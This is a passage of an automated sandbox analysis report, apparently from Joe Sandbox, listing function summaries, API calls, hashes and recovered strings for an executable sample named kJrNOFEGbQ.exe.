                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorLast$_free
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3170660625-0
                                                                                                                                    • Opcode ID: ab882c305d8d1b84d98b785ccec4ae957e9f52960b5555adf6fc3d2f2401dc2b
                                                                                                                                    • Instruction ID: 5103ba57c9c7776e769bd194c278ddae35c715f96dda6e2da60edb2e5a95b2f0
                                                                                                                                    • Opcode Fuzzy Hash: ab882c305d8d1b84d98b785ccec4ae957e9f52960b5555adf6fc3d2f2401dc2b
                                                                                                                                    • Instruction Fuzzy Hash: 8F01F4371447036BD31377646C85B7B256EDBD2770B3A05B7F515A6292EE318D029322
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 003711CF: ResetEvent.KERNEL32(?), ref: 003711E1
                                                                                                                                      • Part of subcall function 003711CF: ReleaseSemaphore.KERNEL32(?,00000000,00000000), ref: 003711F5
                                                                                                                                    • ReleaseSemaphore.KERNEL32(?,00000040,00000000), ref: 00370F21
                                                                                                                                    • CloseHandle.KERNEL32(?,?), ref: 00370F3B
                                                                                                                                    • DeleteCriticalSection.KERNEL32(?), ref: 00370F54
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00370F60
                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00370F6C
                                                                                                                                      • Part of subcall function 00370FE4: WaitForSingleObject.KERNEL32(?,000000FF,00371206,?), ref: 00370FEA
                                                                                                                                      • Part of subcall function 00370FE4: GetLastError.KERNEL32(?), ref: 00370FF6
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: CloseHandle$ReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 1868215902-0
                                                                                                                                    • Opcode ID: 77d7e65652f40ba43c38e29fbe32aaf234c3e7235f5935a947acfe95dcd41fb0
                                                                                                                                    • Instruction ID: 2540cb79de1d536b33339be99f21791785d6b2a5ca31c59d679d19df51c4339d
                                                                                                                                    • Opcode Fuzzy Hash: 77d7e65652f40ba43c38e29fbe32aaf234c3e7235f5935a947acfe95dcd41fb0
                                                                                                                                    • Instruction Fuzzy Hash: 070152B2100744EFC7339B64DC85BC6FBADFB08710F00492AF16B52160C7767A44CA50
                                                                                                                                    APIs
                                                                                                                                    • _free.LIBCMT ref: 0038C817
                                                                                                                                      • Part of subcall function 00388DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?), ref: 00388DE2
                                                                                                                                      • Part of subcall function 00388DCC: GetLastError.KERNEL32(?,?,0038C896,?,00000000,?,00000000,?,0038C8BD,?,00000007,?,?,0038CCBA,?,?), ref: 00388DF4
                                                                                                                                    • _free.LIBCMT ref: 0038C829
                                                                                                                                    • _free.LIBCMT ref: 0038C83B
                                                                                                                                    • _free.LIBCMT ref: 0038C84D
                                                                                                                                    • _free.LIBCMT ref: 0038C85F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$ErrorFreeHeapLast
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 776569668-0
                                                                                                                                    • Opcode ID: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                                                                    • Instruction ID: 46e246b9cff99683a1bcdb29ba8f61ddc732b224907f67ebed3d41024a568e75
                                                                                                                                    • Opcode Fuzzy Hash: 6ed10f187f01be4ab5677fb4ae8cd6daaa5a7db49ed91751090b98e11f3bb022
                                                                                                                                    • Instruction Fuzzy Hash: EAF01232954344ABC623FB68E485C1673EEAB00714B95289AF108DB652CB71FC80CB64
                                                                                                                                    APIs
                                                                                                                                    • _wcslen.LIBCMT ref: 00371FE5
                                                                                                                                    • _wcslen.LIBCMT ref: 00371FF6
                                                                                                                                    • _wcslen.LIBCMT ref: 00372006
                                                                                                                                    • _wcslen.LIBCMT ref: 00372014
                                                                                                                                    • CompareStringW.KERNEL32(00000400,00001001,?,?,?,?,00000000,00000000,?,0036B371,?,?,00000000,?,?,?), ref: 0037202F
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _wcslen$CompareString
                                                                                                                                    • String ID:
                                                                                                                                    • API String ID: 3397213944-0
                                                                                                                                    • Opcode ID: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
                                                                                                                                    • Instruction ID: 500c147e3d789b1729b36346a75a0682b44d037ee8d599e7130045a8b6348dae
                                                                                                                                    • Opcode Fuzzy Hash: a7fcb2cf831586f69406ba9288cc927d58d39d62a38fb42a81996cab2c723b5d
                                                                                                                                    • Instruction Fuzzy Hash: 4AF01D33008118BBDF336F51EC09D8E7F26EB44B61B118455F61A5E161CB72E665D790
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _swprintf
                                                                                                                                    • String ID: %ls$%s: %s
                                                                                                                                    • API String ID: 589789837-2259941744
                                                                                                                                    • Opcode ID: a3b329329430cc203e1b34100522aef45d124d07a01fb987ae9a283aedd33855
                                                                                                                                    • Instruction ID: 4005c1dbf0b4d9e1592dc56fe50f3dbb7ab59a9aa8f3d422c131353fccbe4bed
                                                                                                                                    • Opcode Fuzzy Hash: a3b329329430cc203e1b34100522aef45d124d07a01fb987ae9a283aedd33855
                                                                                                                                    • Instruction Fuzzy Hash: 10511B3B248300F6E63716ACCD46F76767DAB05B04F24C50AF7DE788D5C5AAA410AB1B
                                                                                                                                    APIs
                                                                                                                                    • GetModuleFileNameA.KERNEL32(00000000,C:\Users\user\Desktop\kJrNOFEGbQ.exe,00000104), ref: 00387FAE
                                                                                                                                    • _free.LIBCMT ref: 00388079
                                                                                                                                    • _free.LIBCMT ref: 00388083
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: _free$FileModuleName
                                                                                                                                    • String ID: C:\Users\user\Desktop\kJrNOFEGbQ.exe
                                                                                                                                    • API String ID: 2506810119-2744962998
                                                                                                                                    • Opcode ID: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
                                                                                                                                    • Instruction ID: c3bd64f079113663e3a65c8c0dcfe78438bd6cbf1f9bd66a2369291d6eed04e5
                                                                                                                                    • Opcode Fuzzy Hash: 38c65743563c522a415b742637da5184246ae63930b38da2c66070c6309ff915
                                                                                                                                    • Instruction Fuzzy Hash: BD31A0B1A00319BFCB23EF99DC80D9EBBACEB95310F5540E6E5049B211DA719A458B61
                                                                                                                                    APIs
                                                                                                                                    • EncodePointer.KERNEL32(00000000,?,00000000,1FFFFFFF), ref: 003831FB
                                                                                                                                    • _abort.LIBCMT ref: 00383306
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: EncodePointer_abort
                                                                                                                                    • String ID: MOC$RCC
                                                                                                                                    • API String ID: 948111806-2084237596
                                                                                                                                    • Opcode ID: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
                                                                                                                                    • Instruction ID: 7c39c817586a8f7520cd006003ccbae12b4043431660e008f2a3589bbd1025bc
                                                                                                                                    • Opcode Fuzzy Hash: 62a999111cb5905c37412300bd7eed0c35faceedba77b4168ff8b94f9ef9b977
                                                                                                                                    • Instruction Fuzzy Hash: BD414A71900209AFCF16EF94CD81AEEBBB5FF48704F158499F90467222D735AA50DB50
                                                                                                                                    APIs
                                                                                                                                    • __EH_prolog.LIBCMT ref: 00367406
                                                                                                                                      • Part of subcall function 00363BBA: __EH_prolog.LIBCMT ref: 00363BBF
                                                                                                                                    • GetLastError.KERNEL32(?,?,00000800,?,?,?,00000000,00000000), ref: 003674CD
                                                                                                                                      • Part of subcall function 00367A9C: GetCurrentProcess.KERNEL32(00000020,?), ref: 00367AAB
                                                                                                                                      • Part of subcall function 00367A9C: GetLastError.KERNEL32 ref: 00367AF1
                                                                                                                                      • Part of subcall function 00367A9C: CloseHandle.KERNEL32(?), ref: 00367B00
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ErrorH_prologLast$CloseCurrentHandleProcess
                                                                                                                                    • String ID: SeRestorePrivilege$SeSecurityPrivilege
                                                                                                                                    • API String ID: 3813983858-639343689
                                                                                                                                    • Opcode ID: 680025c8692cb48924e5458133db4cec556ec22a1b813c2f81d5061fc43cbbb8
                                                                                                                                    • Instruction ID: 6df6cedd948a9ba727add404d29af704531cd2ba40e63fd3d1e573a911c65129
                                                                                                                                    • Opcode Fuzzy Hash: 680025c8692cb48924e5458133db4cec556ec22a1b813c2f81d5061fc43cbbb8
                                                                                                                                    • Instruction Fuzzy Hash: 9A31B671D04258AADF13EBA4DC45FEEBB7CAF06308F04C055F505AB285DB748A44CB60
                                                                                                                                    APIs
                                                                                                                                      • Part of subcall function 00361316: GetDlgItem.USER32(00000000,00003021), ref: 0036135A
                                                                                                                                      • Part of subcall function 00361316: SetWindowTextW.USER32(00000000,003935F4), ref: 00361370
                                                                                                                                    • EndDialog.USER32(?,00000001), ref: 0037AD98
                                                                                                                                    • GetDlgItemTextW.USER32(?,00000066,?,?), ref: 0037ADAD
                                                                                                                                    • SetDlgItemTextW.USER32(?,00000066,?), ref: 0037ADC2
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ItemText$DialogWindow
                                                                                                                                    • String ID: ASKNEXTVOL
                                                                                                                                    • API String ID: 445417207-3402441367
                                                                                                                                    • Opcode ID: b439c26659d6ef0e5b45584bc65bd017fd6842209f37b2c663583caa89834217
                                                                                                                                    • Instruction ID: 049f476b3164c0a2057a3753c1ce438da2f4c5648dc024d2dbcbcdc08448ee6c
                                                                                                                                    • Opcode Fuzzy Hash: b439c26659d6ef0e5b45584bc65bd017fd6842209f37b2c663583caa89834217
                                                                                                                                    • Instruction Fuzzy Hash: 2211E632280600BFD7339F68DC55FAE7BADEF8B742F018000F245DB5A5CB65A9159B22
                                                                                                                                    APIs
                                                                                                                                    • DialogBoxParamW.USER32(GETPASSWORD1,00010474,0037B270,?,?), ref: 0037DE18
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: DialogParam
                                                                                                                                    • String ID: GETPASSWORD1$r7$xz;
                                                                                                                                    • API String ID: 665744214-399909694
                                                                                                                                    • Opcode ID: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
                                                                                                                                    • Instruction ID: 7b4b6185393a3f6012e37e20611449c488995c3b6249acd925d5290bfb21ce7d
                                                                                                                                    • Opcode Fuzzy Hash: f2b6ba43b85f6820838e8a3c2c78b8804fc015b85d3b8b7c7c66ab7b5a14ea6d
                                                                                                                                    • Instruction Fuzzy Hash: F5110872640154AADB33DA35AC01BEB37ACAF0B750F158464FE4DEB581CAB8AC84C764
                                                                                                                                    APIs
                                                                                                                                    • __fprintf_l.LIBCMT ref: 0036D954
                                                                                                                                    • _strncpy.LIBCMT ref: 0036D99A
                                                                                                                                      • Part of subcall function 00371DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,003A1030,00000200,0036D928,00000000,?,00000050,003A1030), ref: 00371DC4
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: ByteCharMultiWide__fprintf_l_strncpy
                                                                                                                                    • String ID: $%s$@%s
                                                                                                                                    • API String ID: 562999700-834177443
                                                                                                                                    • Opcode ID: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
                                                                                                                                    • Instruction ID: b867f77d23bf70d38f2d50c000a2f9671c4d7283aef5ab099fcd0203fc06bc03
                                                                                                                                    • Opcode Fuzzy Hash: 36d8b6b1168f1294a73c62a22f2e5d427329d8750602e6b64d16d7a6038fdb75
                                                                                                                                    • Instruction Fuzzy Hash: 98217572940348AEDF22EEA4CC45FEE7BE8AF05704F048511F954961A6E371D658CB51
                                                                                                                                    APIs
                                                                                                                                    • InitializeCriticalSection.KERNEL32(00000320,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E85
                                                                                                                                    • CreateSemaphoreW.KERNEL32(00000000,00000000,00000040,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E8F
                                                                                                                                    • CreateEventW.KERNEL32(00000000,00000001,00000001,00000000,?,?,?,0036AC5A,00000008,?,00000000,?,0036D22D,?,00000000), ref: 00370E9F
                                                                                                                                    Strings
                                                                                                                                    • Thread pool initialization failed., xrefs: 00370EB7
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Create$CriticalEventInitializeSectionSemaphore
                                                                                                                                    • String ID: Thread pool initialization failed.
                                                                                                                                    • API String ID: 3340455307-2182114853
                                                                                                                                    • Opcode ID: 262b32aad9d5bbeb5d982d8e0ca910570078f93cdbe23aa9b4b981b95b0473b0
                                                                                                                                    • Instruction ID: 6500cd86575770bf4040ef7d36992d1a2fd7538c36ed604b91f9162df0083e0f
                                                                                                                                    • Opcode Fuzzy Hash: 262b32aad9d5bbeb5d982d8e0ca910570078f93cdbe23aa9b4b981b95b0473b0
                                                                                                                                    • Instruction Fuzzy Hash: 341191B1600B08DFC3365F7ADC84AABFBECEB55744F10882EF1DAC6600D67599408B50
                                                                                                                                    APIs
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                    • Snapshot File: hcaresult_0_2_360000_kJrNOFEGbQ.jbxd
                                                                                                                                    Similarity
                                                                                                                                    • API ID: Malloc
                                                                                                                                    • String ID: (7$27$A
                                                                                                                                    • API String ID: 2696272793-678002403
                                                                                                                                    • Opcode ID: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
                                                                                                                                    • Instruction ID: 5d87b810538876cfeb02f0b203db69c2809ddc9b18fd76a3e35f358f242043cb
                                                                                                                                    • Opcode Fuzzy Hash: 8939394c6a917f3addf29042aae2e872a0e598e62c182522bbd4ae258a048e6c
                                                                                                                                    • Instruction Fuzzy Hash: 1A011B72901229ABCB15CFA4D8449DEBBFCEF09300F10855AE906E3200D735AE40CF94
                                                                                                                                    Strings
                                                                                                                                    Memory Dump Source
                                                                                                                                    • Source File: 00000000.00000002.1666174609.0000000000361000.00000020.00000001.01000000.00000003.sdmp, Offset: 00360000, based on PE: true
                                                                                                                                    • Associated: 00000000.00000002.1666151972.0000000000360000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666211489.0000000000393000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.000000000039E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003A5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666233100.00000000003C2000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.00000000003C3000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    • Associated: 00000000.00000002.1666302162.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                    Joe Sandbox IDA Plugin
